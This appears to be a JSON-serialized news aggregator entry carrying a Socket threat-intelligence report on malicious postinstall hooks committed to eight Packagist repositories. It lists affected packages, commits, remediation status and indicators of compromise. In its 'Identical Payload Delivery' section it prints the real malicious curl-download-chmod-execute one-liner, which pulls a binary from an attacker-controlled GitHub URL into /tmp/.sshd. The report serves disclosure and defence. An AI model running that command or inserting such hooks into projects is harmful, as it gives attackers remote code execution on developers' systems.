[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fGQBpG8PPd7kHKuT96tvDU9e4QzB7klr77Qvc99s0AVo":3},{"article":4,"iocs":56},{"id":5,"title":6,"slug":7,"summary":8,"ai_summary":9,"brief":10,"full_text":11,"url":12,"image_url":13,"published_at":14,"ingested_at":15,"relevance_score":16,"entities":17,"category_id":35,"category":36,"article_tags":40},"f1b72fff-ed9c-408d-b98e-4f021d170880","Malicious Postinstall Hook Found Across 700+ GitHub Repositories, Including Packagist and Node.js Projects","malicious-postinstall-hook-found-across-700-github-repositories-including-packag-4fdf9d","Socket researchers identified a coordinated supply chain campaign affecting eight Composer packages whose upstream repositories were modified to include the same malicious postinstall script. The script attempted to download a Linux binary from a GitHub Releases URL, save it to \u002Ftmp\u002F.sshd, make it executable, and run it in the background. The affected packages were all Composer packages, but the malicious code was not added to composer.json. Instead, it was inserted into package.json, targeting projects that ship JavaScript build tooling alongside PHP code. That cross-ecosystem placement is notable because developers and security teams reviewing PHP dependencies may focus on Composer metadata while overlooking package.json lifecycle hooks bundled inside the package. Socket’s AI scanner detected the campaign across eight branch-tracking package versions: Package Affected Version moritz-sauer-13\u002Fsilverstripe-cms-theme dev-master crosiersource\u002Fcrosierlib-base dev-master devdojo\u002Fwave dev-main devdojo\u002Fgenesis dev-main katanaui\u002Fkatana dev-main elitedevsquad\u002Fsidecar-laravel 3.x-dev r2luna\u002Fbrain dev-main baskarcm\u002Ftzi-chat-ui dev-main Socket’s AI scanner flagged all eight affected package artifacts after identifying the same suspicious install-time behavior across the set. We identified multiple packages with a postinstall hook that downloads an external binary and immediately executes it, often placing the file at \u002Ftmp\u002F.sshd, with weakened TLS verification and background execution. Broader GitHub Search Shows Hundreds of References # During the course of this investigation, Socket found that the campaign was not limited to the initial Packagist packages flagged by the AI scanner. A GitHub code search for the attacker-controlled account parikhpreyash4 returned hundreds of public code results approximately 17 hours after the first detection, including many Node.js repositories. Socket has not yet confirmed how many of those results represent distinct compromises, forks, duplicate package artifacts, or cached references. However, the volume of results tied to the same attacker infrastructure suggests a broader campaign involving the same package.json postinstall payload. The confirmed Packagist findings remain the clearest evidence available so far: eight PHP packages contained the same install-time command that downloaded gvfsd-network from the attacker-controlled GitHub Releases URL, wrote it to \u002Ftmp\u002F.sshd, made it executable, and launched it in the background. Follow-up GitHub searches indicate the same infrastructure may have been reused across a much wider set of JavaScript projects. Identical Payload Delivery # The malicious postinstall script was identical across the confirmed package artifacts: curl-skL https:\u002F\u002Fgithub.com\u002Fparikhpreyash4\u002Fsystemd-network-helper-aa5c751f\u002Freleases\u002Flatest\u002Fdownload\u002Fgvfsd-network-o \u002Ftmp\u002F.sshd2>\u002Fdev\u002Fnull &&chmod+x \u002Ftmp\u002F.sshd && \u002Ftmp\u002F.sshd & The command has several high-risk characteristics: It uses curl -k, disabling TLS certificate verification. It downloads a binary named gvfsd-network from GitHub Releases. It writes the binary to \u002Ftmp\u002F.sshd, a hidden filename that resembles an SSH daemon. It suppresses error output with 2>\u002Fdev\u002Fnull. It makes the file executable with chmod +x. It runs the binary in the background using &. Socket researchers were unable to retrieve the second-stage binary during follow-up because the GitHub-hosted payload was no longer available. However, the first-stage behavior is sufficient to classify the packages as malicious. The script downloads and executes an unauthenticated remote binary during installation with no integrity check, while suppressing errors and hiding the executable under a system-like filename. Malicious Commits in Upstream GitHub Repositories # moritz-sauer-13\u002Fsilverstripe-cms-theme Malicious commit: 7825479 Cleanup status: The hook was still present on master when checked. crosiersource\u002Fcrosierlib-base Malicious commit: 551c319 Cleanup status: The hook was still present on master when checked. thedevdojo\u002Fwave Malicious commit: 8f9127a Cleanup status: Reverted by 5afe6da. thedevdojo\u002Fgenesis Malicious commit: fe7b1cd Cleanup status: Reverted by 3be1f20. katanaui\u002Fkatana Malicious commit: a32f9e1 Cleanup status: Reverted by f679252. elitedevsquad\u002Fsidecar-laravel Malicious commit: ed6fd36 Cleanup status: Reverted by b1f5c53, titled security: revert malicious postinstall payload. r2luna\u002Fbrain Malicious commit: 85eca91 Cleanup status: Reverted by 421a1d5, titled security: revert malicious postinstall payload. baskarcm\u002Ftzi-chat-ui Malicious commit: 58fa0b2 Cleanup status: The hook was still present on main when checked. # The confirmed Packagist findings appear to stem from malicious commits made directly to upstream GitHub repositories. In each case, the attacker added the same package.json postinstall script to a repository that was tracked by Packagist. Once Packagist updated its branch-tracking package versions, those malicious repository states became infected package artifacts. The campaign was not necessarily aimed at Packagist itself. The attacker targeted source repositories, and Packagist reflected those changes through dev-main, dev-master, and 3.x-dev package versions. Several maintainers later reverted the malicious commits, which caused the current branch-tracking package views to move back to clean artifacts. The malicious code was placed in package.json, not composer.json, targeting repositories that included JavaScript build tooling alongside PHP code. In PHP projects, that placement can be easy to miss if defenders focus only on Composer metadata while overlooking JavaScript lifecycle scripts bundled in the same repository. Socket reported the affected packages to Packagist, which immediately removed them. Branch-Tracking Versions Complicate Response # Most affected versions were development branches, including dev-main, dev-master, and 3.x-dev. These are branch-tracking versions rather than immutable releases. This also affected remediation. Packagist temporarily deleted the affected package entries, but noted that branch-tracking packages could be restored on the next package update unless the upstream repository was fixed. For defenders, this means the affected version label alone is not enough. The relevant artifact should be tied to the observed commit or archive state when available. Potential for Execution # Two of the affected packages account for most of the practical risk. devdojo\u002Fwave is an open source Laravel SaaS starter kit with roughly 6,400 GitHub stars. devdojo\u002Fgenesis, from the same publisher, has about 1,300 stars and 9,100 Packagist installs. Its Packagist metadata describes it as a Laravel starter kit built with Tailwind CSS, Alpine.js, Laravel, Livewire, Folio, and Volt. Starter kits are the worst case for this attack pattern. The repository becomes the developer's project, so the malicious package.json lands at the project root, where npm install runs its postinstall script directly. For the other affected packages, which are libraries pulled into vendor\u002F, the postinstall hook does not fire from a top-level npm install, since npm only runs scripts for packages declared in the root project's dependencies. The remaining six affected Packagist packages appear to have much smaller adoption and more niche or personal use cases. That does not make the compromise benign, but it does concentrate the most likely real-world exposure in the starter kit projects. Recommendations # Teams using Packagist packages that include JavaScript build tooling should inspect bundled package.json files, not only composer.json. This is especially important for branch-tracking Composer dependencies, where the package contents can change as the upstream branch moves. Socket flagged the affected package artifacts as malicious based on their install-time behavior. The detected pattern matched a coordinated supply chain campaign: unrelated packages contained the same lifecycle hook, the same GitHub Releases payload URL, the same hidden local filename, and the same background execution chain. Even without the second-stage binary, the malicious installer is enough to warrant blocking. It provides remote code execution during installation or build workflows and attempts to hide its activity by disabling TLS verification, suppressing errors, and running a downloaded binary in the background. Indicators of Compromise # GitHub account: parikhpreyash4 GitHub repository: parikhpreyash4\u002Fsystemd-network-helper-aa5c751f Payload URL: https:\u002F\u002Fgithub.com\u002Fparikhpreyash4\u002Fsystemd-network-helper-aa5c751f\u002Freleases\u002Flatest\u002Fdownload\u002Fgvfsd-network Payload File Path: \u002Ftmp\u002F.sshd Suspicious command fragments: curl -skL chmod +x \u002Ftmp\u002F.sshd \u002Ftmp\u002F.sshd &","Socket researchers identified a coordinated supply chain campaign affecting eight Composer packages on Packagist, where upstream repositories were modified to include malicious postinstall scripts in package.json files. The scripts attempted to download a Linux binary named gvfsd-network from an attacker-controlled GitHub Releases URL, save it to \u002Ftmp\u002F.sshd, and execute it in the background with disabled TLS verification. A broader GitHub search revealed hundreds of additional references to the same attacker infrastructure across Node.js repositories, suggesting the campaign extends far beyond the confirmed Packagist findings.","Malicious postinstall hooks discovered across 700+ GitHub repos targeting PHP and Node.js packages via Packagist.","Security NewsAI Has Taken Over Open SourceVibe coding at scale is reshaping how packages are created, contributed, and selected across the software supply chainBy André Staltz - May 22, 2026","https:\u002F\u002Fsocket.dev\u002Fblog\u002Fmalicious-postinstall-hook-found-across-700-github-repos?utm_medium=feed","https:\u002F\u002Fcdn.sanity.io\u002Fimages\u002Fcgdhsj6q\u002Fproduction\u002Fd66a69ec89dc89742b33b6b178982263b5f44386-1672x941.png?w=1000&q=95&fit=max&auto=format","2026-05-22T21:03:29.112+00:00","2026-05-22T22:00:21.049859+00:00",9,[18,21,24,27,29,32],{"name":19,"type":20},"parikhpreyash4","threat_actor",{"name":22,"type":23},"systemd-network-helper supply chain attack","campaign",{"name":25,"type":26},"devdojo\u002Fwave","product",{"name":28,"type":26},"devdojo\u002Fgenesis",{"name":30,"type":31},"npm postinstall hooks","technology",{"name":33,"type":34},"Packagist","vendor","26b0b636-0e31-4db1-bffb-61bdf9f20a58",{"id":35,"icon":37,"name":38,"slug":39},null,"Supply Chain","supply-chain",[41,46,51],{"category":42},{"id":43,"icon":37,"name":44,"slug":45},"89f78b1c-3503-45a1-9fc7-e23d2ce1c6d5","Malware","malware",{"category":47},{"id":48,"icon":37,"name":49,"slug":50},"ade75414-7914-4e23-a450-48b64546ee70","Open Source","open-source",{"category":52},{"id":53,"icon":37,"name":54,"slug":55},"e7b231c8-5f79-4465-8d38-1ef13aea5a14","Threat Intelligence","threat-intelligence",[57,61],{"type":58,"value":59,"context":60},"url","https:\u002F\u002Fgithub.com\u002Fparikhpreyash4\u002Fsystemd-network-helper-aa5c751f\u002Freleases\u002Flatest\u002Fdownload\u002Fgvfsd-network","Malicious binary download URL used in postinstall hook",{"type":45,"value":62,"context":63},"gvfsd-network","Second-stage malicious Linux binary downloaded and executed from \u002Ftmp\u002F.sshd"]